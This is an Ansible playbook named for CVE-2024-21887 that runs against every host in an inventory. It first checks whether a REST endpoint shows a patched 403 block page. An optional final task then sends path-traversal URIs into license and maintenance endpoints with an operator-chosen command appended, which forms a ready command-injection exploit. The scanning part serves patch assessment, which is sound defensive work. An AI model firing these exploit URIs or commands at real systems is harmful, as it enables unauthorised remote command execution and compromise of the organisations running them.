- name: CVE-2024-21887
  gather_facts: false
  hosts: all
  vars:
    uris: 
      - "api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark"
    ports:
      - 8080
    pattern: 'Access\sto\sthe\sWeb\ssite\sis\sblocked\sby\syour\sadministrator'
    exploit: false
    exploit_uris:
      - "api/v1/totp/user-backup-code/../../license/keys-status"
      - "api/v1/totp/user-backup-code/../../system/maintenance/archiving"
    exploit_cmd: ""

  tasks:
    - name: Assess patch condition
      ansible.builtin.uri:
        url: "http{{ (item.0 | int == 443) | ternary('s', '') }}://{{ inventory_hostname }}:{{ item.0 }}/{{ item.1 }}"
        method: GET
        timeout: 2
        status_code: 403
        return_content: true
        force: true
        validate_certs: false
      register: response
      loop: "{{ ports | product(uris) }}"
      ignore_errors: true
      delegate_to: 127.0.0.1

    - name: Assert patch condition response
      ansible.builtin.assert:
        that:
          - item.content | regex_search(pattern)
        fail_msg: "Vulnerbale"
        success_msg: "Not Vulnerable"
      loop: "{{ response.results }}"
      when:
        - response is defined
        - item.status == 403

    - name: Assess vulnerable condition
      ansible.builtin.uri:
        url: "http{{ (item.0 | int == 443) | ternary('s', '') }}://{{ inventory_hostname }}:{{ item.0 }}/{{ item.1 }}/{{ exploit_cmd }}"
        method: GET
        timeout: 2
        status_code: 200
        return_content: true
        force: true
        validate_certs: false
      register: response
      loop: "{{ ports | product(exploit_uris) }}"
      ignore_errors: true
      delegate_to: 127.0.0.1
      when: 
        - exploit | bool
        - exploit_cmd is defined
        - exploit_cmd | length > 0
